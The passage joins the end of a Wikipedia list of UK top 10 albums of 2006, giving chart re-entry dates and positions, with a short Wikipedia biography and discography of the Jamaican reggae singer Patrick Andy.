ending) for 2 weeks and at number 8 on 3 February 2007 (week ending) for 2 weeks. Loose re-entered the top 10 at number 9 on 9 September 2006 (week ending) for 3 weeks, at number 9 on 3 March 2007 (week ending) for 3 weeks, at number 6 on 31 March 2007 (week ending) for 7 weeks and at number 7 on 14 July 2007 (week ending) for 3 weeks. Black Holes and Revelations re-entered the top 10 at number 8 on 9 September 2006 (week ending) for 2 weeks. Razorlight re-entered the top 10 at number 8 on 23 September 2006 (week ending) for 8 weeks, at number 7 on 25 November 2006 (week ending) for 2 weeks, at number 9 on 30 December 2006 (week ending) for 6 weeks and at number 9 on 24 February 2007 (week ending). Alright, Still re-entered the top 10 at number 4 on 7 October 2006 (week ending) for 4 weeks, at number 6 on 27 January 2007 (week ending) for 2 weeks and at number 7 on 3 March 2007 (week ending) for 2 weeks. These Streets re-entered the top 10 at number 10 on 7 October 2006 (week ending) for 2 weeks, at number 8 on 28 October 2006 (week ending), at number 9 on 13 January 2007 (week ending) for 4 weeks and at number 10 on 1 September 2007 (week ending) for 2 weeks. Undiscovered re-entered the top 10 at number 8 on 21 October 2006 (week ending) for 3 weeks and at number 8 on 6 January 2007 (week ending) for 9 weeks. FutureSex/LoveSounds re-entered the top 10 at number 10 on 11 November 2006 (week ending), at number 9 on 31 March 2007 (week ending) for 2 weeks and at number 7 on 21 April 2007 (week ending) for 3 weeks. Costello Music re-entered the top 10 at number 6 on 13 January 2007 (week ending) for 4 weeks and at number 10 on 3 March 2007 (week ending). Ta-Dah re-entered the top 10 at number 10 on 30 December 2006 (week ending). Sam's Town re-entered the top 10 at number 6 on 3 March 2007 (week ending) for 3 weeks and at number 9 on 7 July 2007 (week ending). Back to Black re-entered the top 10 at number 2 on 13 January 2007 (week ending) for 28 weeks, at number 8 on 28 July 2007 (week ending) for 18 weeks and at number 9 on 8 December 2007 (week ending) for 7 weeks. Beautiful World re-entered the top 10 at number 5 on 24 February 2007 (week ending) for 10 weeks, at number 9 on 24 November 2007 (week ending) for 2 weeks and at number 10 on 15 December 2007 (week ending) for 8 weeks. B'Day re-entered the top 10 at number 8 on 5 May 2007 (week ending). Figure includes album that peaked in 2005. See also 2006 in British music List of number-one albums from the 2000s (UK) References General Specific External links 2006 album chart archive at the Official Charts Company (click on relevant week) United Kingdom top 10 albums Top 10 albums 2006
{ "pile_set_name": "Wikipedia (en)" }
Patrick Andy Patrick Andy (born c. 1960, Clarendon Parish, Jamaica) is a reggae singer, whose stage name is a reference to his similarity to the older reggae singer Horace Andy. Biography Patrick Andy began singing at church and in school, and began his recording career working with Yabby You in the mid-1970s, often covering songs by Horace Andy. In 1978 he had a hit with "Woman, Woman, Woman", in combination with Ranking Barnabus, and a solo hit with "My Angel". In the early 1980s he began recording with producer Joseph Hoo Kim at Channel One Studios, and further hits followed with "Tired Fe Lick Weed Inna Bush" and "Pretty Me". He had further hits with "Get Up Stand Up" (1984), "Smiling", and "Sting Me a Sting, Shock Me a Shock", recorded for Prince Jammy in 1985. More hits followed and Andy recorded a number of "clash" albums, where tracks were split between Andy and a series of "opponents", including Wayne Smith, Frankie Jones, Half Pint, and Horace Andy. Discography Showdown vol. 7 (1984) Channel One/Hitbound (with Wayne Smith) Two New Superstars (1985) Burning Sounds (with Frankie Jones) Clash of the Andys (1985) Thunder Bolt (with Horace Andy) References External links Patrick Andy at Roots Archives Category:Jamaican reggae musicians Category:People from Clarendon Parish, Jamaica Category:Living people Category:1960s births
{ "pile_set_name": "Wikipedia (en)" }